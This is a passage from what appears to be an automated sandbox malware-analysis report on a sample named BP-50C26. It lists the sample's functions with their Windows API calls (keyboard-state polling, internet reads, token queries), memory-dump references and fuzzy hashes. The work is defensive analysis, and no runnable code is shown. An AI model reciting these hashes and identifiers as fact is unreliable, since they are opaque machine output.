                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: _free
                                                                                      • String ID:
                                                                                      • API String ID: 269201875-0
                                                                                      • Opcode ID: 02486860fd1d424121392623f8d10b6a46551600fc63ca2e71f70b904b95004f
                                                                                      • Instruction ID: b19240197a56ccea0a72bce3529d795c55f8f2b5eb6317d320186160d17c6c96
                                                                                      • Opcode Fuzzy Hash: 02486860fd1d424121392623f8d10b6a46551600fc63ca2e71f70b904b95004f
                                                                                      • Instruction Fuzzy Hash: 6C41D232A002049FDB24DF78C882A5EB7F5FF89314F5545A9F516EB396DA31AE01DB80
                                                                                      Function 00C2912D Relevance: 7.6, APIs: 5, Instructions: 121keyboardCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetCursorPos.USER32(?), ref: 00C29141
                                                                                      • ScreenToClient.USER32(00000000,?), ref: 00C2915E
                                                                                      • GetAsyncKeyState.USER32(00000001), ref: 00C29183
                                                                                      • GetAsyncKeyState.USER32(00000002), ref: 00C2919D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: AsyncState$ClientCursorScreen
                                                                                      • String ID:
                                                                                      • API String ID: 4210589936-0
                                                                                      • Opcode ID: c0428757d055ad37b03007490e9f55d15503c98d9ad3a9ddaaee89f549821b6c
                                                                                      • Instruction ID: 9dacc6e59ed7bb2fa65dbb122126fdfcaeb5d2635c6a16536231ff5059e6c75d
                                                                                      • Opcode Fuzzy Hash: c0428757d055ad37b03007490e9f55d15503c98d9ad3a9ddaaee89f549821b6c
                                                                                      • Instruction Fuzzy Hash: 3E415F7190861AABDF159F69D884BEEB774FB06328F204716E439A32D0C7345A50DB91
                                                                                      Function 00C83874 Relevance: 7.6, APIs: 5, Instructions: 101windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetInputState.USER32 ref: 00C838CB
                                                                                      • TranslateAcceleratorW.USER32(?,00000000,?), ref: 00C83922
                                                                                      • TranslateMessage.USER32(?), ref: 00C8394B
                                                                                      • DispatchMessageW.USER32(?), ref: 00C83955
                                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00C83966
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                                                                      • String ID:
                                                                                      • API String ID: 2256411358-0
                                                                                      • Opcode ID: e887c418916292665a58f17da1e37e9e88640ae6f44945564ab405148d25e1c1
                                                                                      • Instruction ID: 396f0db20c75396455cb4709baed9ceba361d67a789717ec0c0139a84f5021bb
                                                                                      • Opcode Fuzzy Hash: e887c418916292665a58f17da1e37e9e88640ae6f44945564ab405148d25e1c1
                                                                                      • Instruction Fuzzy Hash: D231C4709043C19EEB35EB35D888BBA37A8AB05718F08156DE876870E0E7B49B85DB15
                                                                                      Function 00C8CF1A Relevance: 7.6, APIs: 5, Instructions: 93networkfileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,00C8C21E,00000000), ref: 00C8CF38
                                                                                      • InternetReadFile.WININET(?,00000000,?,?), ref: 00C8CF6F
                                                                                      • GetLastError.KERNEL32(?,00000000,?,?,?,00C8C21E,00000000), ref: 00C8CFB4
                                                                                      • SetEvent.KERNEL32(?,?,00000000,?,?,?,00C8C21E,00000000), ref: 00C8CFC8
                                                                                      • SetEvent.KERNEL32(?,?,00000000,?,?,?,00C8C21E,00000000), ref: 00C8CFF2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
                                                                                      • String ID:
                                                                                      • API String ID: 3191363074-0
                                                                                      • Opcode ID: ccc2e385ecc8f2632fef63ec01da870c6c0bb91191e4302ef67865b6dd309e60
                                                                                      • Instruction ID: d5f1868f06fd41a5020069fce40b4d6cf5a62c3e7e459896911ebe742689cc31
                                                                                      • Opcode Fuzzy Hash: ccc2e385ecc8f2632fef63ec01da870c6c0bb91191e4302ef67865b6dd309e60
                                                                                      • Instruction Fuzzy Hash: 2A314A71604205AFEB20EFE5D8C4AAFBBF9EB15359B10442EF616D3150DB30AE41DB64
                                                                                      Function 00C71901 Relevance: 7.6, APIs: 5, Instructions: 93sleepwindowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetWindowRect.USER32(?,?), ref: 00C71915
                                                                                      • PostMessageW.USER32(00000001,00000201,00000001), ref: 00C719C1
                                                                                      • Sleep.KERNEL32(00000000,?,?,?), ref: 00C719C9
                                                                                      • PostMessageW.USER32(00000001,00000202,00000000), ref: 00C719DA
                                                                                      • Sleep.KERNEL32(00000000,?,?,?,?), ref: 00C719E2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessagePostSleep$RectWindow
                                                                                      • String ID:
                                                                                      • API String ID: 3382505437-0
                                                                                      • Opcode ID: 8e04a7f14d2d1f2696da8696939f6f345169df97f071ec9970f9d2ef6472a2bf
                                                                                      • Instruction ID: d33da82fc581b4ecf88efacc7979625b46d0d479b705b20d83128c60197a5489
                                                                                      • Opcode Fuzzy Hash: 8e04a7f14d2d1f2696da8696939f6f345169df97f071ec9970f9d2ef6472a2bf
                                                                                      • Instruction Fuzzy Hash: 4C31AD71A00219EFCB10CFACC999BDE3BB5EB45315F148229FE25A72D1C7709A55CB90
                                                                                      Function 00CA5706 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00CA5745
                                                                                      • SendMessageW.USER32(?,00001074,?,00000001), ref: 00CA579D
                                                                                      • _wcslen.LIBCMT ref: 00CA57AF
                                                                                      • _wcslen.LIBCMT ref: 00CA57BA
                                                                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 00CA5816
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$_wcslen
                                                                                      • String ID:
                                                                                      • API String ID: 763830540-0
                                                                                      • Opcode ID: aaebbe025575b96a743e53faa375b62ecf994364ae2d0d0f917f49ea1f9a8c66
                                                                                      • Instruction ID: ccdc12899dd236c23d61d852eb723e54197d7a75e03ee72afa841572a262523e
                                                                                      • Opcode Fuzzy Hash: aaebbe025575b96a743e53faa375b62ecf994364ae2d0d0f917f49ea1f9a8c66
                                                                                      • Instruction Fuzzy Hash: 8B217175914619DADB209FA1CC85AEE77BCFF06728F108216F929EB1C0D7709A85CF50
                                                                                      Function 00C90930 Relevance: 7.6, APIs: 5, Instructions: 69COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • IsWindow.USER32(00000000), ref: 00C90951
                                                                                      • GetForegroundWindow.USER32 ref: 00C90968
                                                                                      • GetDC.USER32(00000000), ref: 00C909A4
                                                                                      • GetPixel.GDI32(00000000,?,00000003), ref: 00C909B0
                                                                                      • ReleaseDC.USER32(00000000,00000003), ref: 00C909E8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$ForegroundPixelRelease
                                                                                      • String ID:
                                                                                      • API String ID: 4156661090-0
                                                                                      • Opcode ID: c889d8587108f8c8bf25e82b7d7483836d405551573d10763aac045e565591c5
                                                                                      • Instruction ID: 32764b1aac556f408b76e7b936cd15e67fc6c2f11114647279d8e99f7a77e991
                                                                                      • Opcode Fuzzy Hash: c889d8587108f8c8bf25e82b7d7483836d405551573d10763aac045e565591c5
                                                                                      • Instruction Fuzzy Hash: 3F219335600204AFD704EF65C988BAEBBF9EF45704F148468F85AE7352DB30AD45DB50
                                                                                      Function 00C4CDBD Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetEnvironmentStringsW.KERNEL32 ref: 00C4CDC6
                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00C4CDE9
                                                                                        • Part of subcall function 00C43820: RtlAllocateHeap.NTDLL(00000000,?,00CE1444,?,00C2FDF5,?,?,00C1A976,00000010,00CE1440,00C113FC,?,00C113C6,?,00C11129), ref: 00C43852
                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00C4CE0F
                                                                                      • _free.LIBCMT ref: 00C4CE22
                                                                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00C4CE31
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                      • String ID:
                                                                                      • API String ID: 336800556-0
                                                                                      • Opcode ID: 1e6ff1423602e380e88ed5c00ce5724682d78a10909c2c8163d4757b70054281
                                                                                      • Instruction ID: ea07bd886d0eb9c83850cf7348a92847241fb4684646f49fc5c6d31d89eccc87
                                                                                      • Opcode Fuzzy Hash: 1e6ff1423602e380e88ed5c00ce5724682d78a10909c2c8163d4757b70054281
                                                                                      • Instruction Fuzzy Hash: 280184726032157F276116B76CC8E7F696DFFC7BA53150129F915C7221EF618E0291B0
                                                                                      Function 00C29639 Relevance: 7.6, APIs: 5, Instructions: 66COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00C29693
                                                                                      • SelectObject.GDI32(?,00000000), ref: 00C296A2
                                                                                      • BeginPath.GDI32(?), ref: 00C296B9
                                                                                      • SelectObject.GDI32(?,00000000), ref: 00C296E2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: ObjectSelect$BeginCreatePath
                                                                                      • String ID:
                                                                                      • API String ID: 3225163088-0
                                                                                      • Opcode ID: f0f4e052ee40dca24412d6271d2ef15ca748077e77ae760ca1d974bcc11c6989
                                                                                      • Instruction ID: 5f6ac1c31ca30080bd953acf03588565ba5599bb8a7b5e2c625e2bcd9aed6b95
                                                                                      • Opcode Fuzzy Hash: f0f4e052ee40dca24412d6271d2ef15ca748077e77ae760ca1d974bcc11c6989
                                                                                      • Instruction Fuzzy Hash: 3A218030802355EBDB119F25FC88BAD3BB8FB01315F140216F820AB1B2D37499A1CF90
                                                                                      Function 00C75711 Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: _memcmp
                                                                                      • String ID:
                                                                                      • API String ID: 2931989736-0
                                                                                      • Opcode ID: b37fcbc03c6e163636846b32fa46487886925fcfa423922f9029b60c270bfd1c
                                                                                      • Instruction ID: 5f1365d5740565f059f276c94699a8967c8861ecb13e1517458d30e1feccc306
                                                                                      • Opcode Fuzzy Hash: b37fcbc03c6e163636846b32fa46487886925fcfa423922f9029b60c270bfd1c
                                                                                      • Instruction Fuzzy Hash: BC01B5A166160ABFE21C55529D82FBB735C9B213A8F048034FD1C9A241F7B1EE5196B0
                                                                                      Function 00C42DF8 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetLastError.KERNEL32(?,?,?,00C3F2DE,00C43863,00CE1444,?,00C2FDF5,?,?,00C1A976,00000010,00CE1440,00C113FC,?,00C113C6), ref: 00C42DFD
                                                                                      • _free.LIBCMT ref: 00C42E32
                                                                                      • _free.LIBCMT ref: 00C42E59
                                                                                      • SetLastError.KERNEL32(00000000,00C11129), ref: 00C42E66
                                                                                      • SetLastError.KERNEL32(00000000,00C11129), ref: 00C42E6F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLast$_free
                                                                                      • String ID:
                                                                                      • API String ID: 3170660625-0
                                                                                      • Opcode ID: 58c2cb26508208c079a4a47db4a4cefc18bbb548c7fc324c0c9864c6584d7da8
                                                                                      • Instruction ID: adda5209417a560a065c70c62d2a5d01e01a3adf73e292cc56b86b5f37624545
                                                                                      • Opcode Fuzzy Hash: 58c2cb26508208c079a4a47db4a4cefc18bbb548c7fc324c0c9864c6584d7da8
                                                                                      • Instruction Fuzzy Hash: FA01F43260660167CA1267366C87F6F2669BBD23A6BE40029F431E32A3EF74CD01A120
                                                                                      Function 00C7000E Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00C6FF41,80070057,?,?,?,00C7035E), ref: 00C7002B
                                                                                      • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00C6FF41,80070057,?,?), ref: 00C70046
                                                                                      • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00C6FF41,80070057,?,?), ref: 00C70054
                                                                                      • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00C6FF41,80070057,?), ref: 00C70064
                                                                                      • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00C6FF41,80070057,?,?), ref: 00C70070
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                      • String ID:
                                                                                      • API String ID: 3897988419-0
                                                                                      • Opcode ID: ee660adf0c313c44579a228422833e6a8b96572f4007c1e6c2da50107195b175
                                                                                      • Instruction ID: 14162b03d2dc074b54f4ff1eb9af76beef692ffff95eb12ac3eb8bce7b676739
                                                                                      • Opcode Fuzzy Hash: ee660adf0c313c44579a228422833e6a8b96572f4007c1e6c2da50107195b175
                                                                                      • Instruction Fuzzy Hash: 0F018F72600204FFDB104F69DC48BAE7BEDEB44766F248124F909D3210D779DE409BA0
                                                                                      Function 00C7E97B Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • QueryPerformanceCounter.KERNEL32(?), ref: 00C7E997
                                                                                      • QueryPerformanceFrequency.KERNEL32(?), ref: 00C7E9A5
                                                                                      • Sleep.KERNEL32(00000000), ref: 00C7E9AD
                                                                                      • QueryPerformanceCounter.KERNEL32(?), ref: 00C7E9B7
                                                                                      • Sleep.KERNEL32 ref: 00C7E9F3
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                      • String ID:
                                                                                      • API String ID: 2833360925-0
                                                                                      • Opcode ID: 829d73f68c671ae9f6c23f989a63d9913a920420df60f085f44ec2929094de10
                                                                                      • Instruction ID: 4e18c7f28a7ef5cdf624d1fe8092a59fed739ee978d7bf2840c80478ca3c481b
                                                                                      • Opcode Fuzzy Hash: 829d73f68c671ae9f6c23f989a63d9913a920420df60f085f44ec2929094de10
                                                                                      • Instruction Fuzzy Hash: D6011732D01629DBCF00ABE5D899BEDBB78BF0E701F004596EA16B2251CB349655CBA1
                                                                                      Function 00C710F9 Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00C71114
                                                                                      • GetLastError.KERNEL32(?,00000000,00000000,?,?,00C70B9B,?,?,?), ref: 00C71120
                                                                                      • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00C70B9B,?,?,?), ref: 00C7112F
                                                                                      • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00C70B9B,?,?,?), ref: 00C71136
                                                                                      • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00C7114D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                      • String ID:
                                                                                      • API String ID: 842720411-0
                                                                                      • Opcode ID: 44d01111d23d7106b58d3e67612ab5314162627c8dec4f164e52cf41d2c5e68c
                                                                                      • Instruction ID: ff8d790bba3247bf815beb54ce1f44f01da9292ad32f034bfd7dcd0b6041220c
                                                                                      • Opcode Fuzzy Hash: 44d01111d23d7106b58d3e67612ab5314162627c8dec4f164e52cf41d2c5e68c
                                                                                      • Instruction Fuzzy Hash: 54011975200205BFDB114FA9DC89B6E3B6EEF8A3A4B644419FA45D7360DA31DD109A60
                                                                                      Function 00C70FB4 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00C70FCA
                                                                                      • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00C70FD6
                                                                                      • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00C70FE5
                                                                                      • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00C70FEC
                                                                                      • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00C71002
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
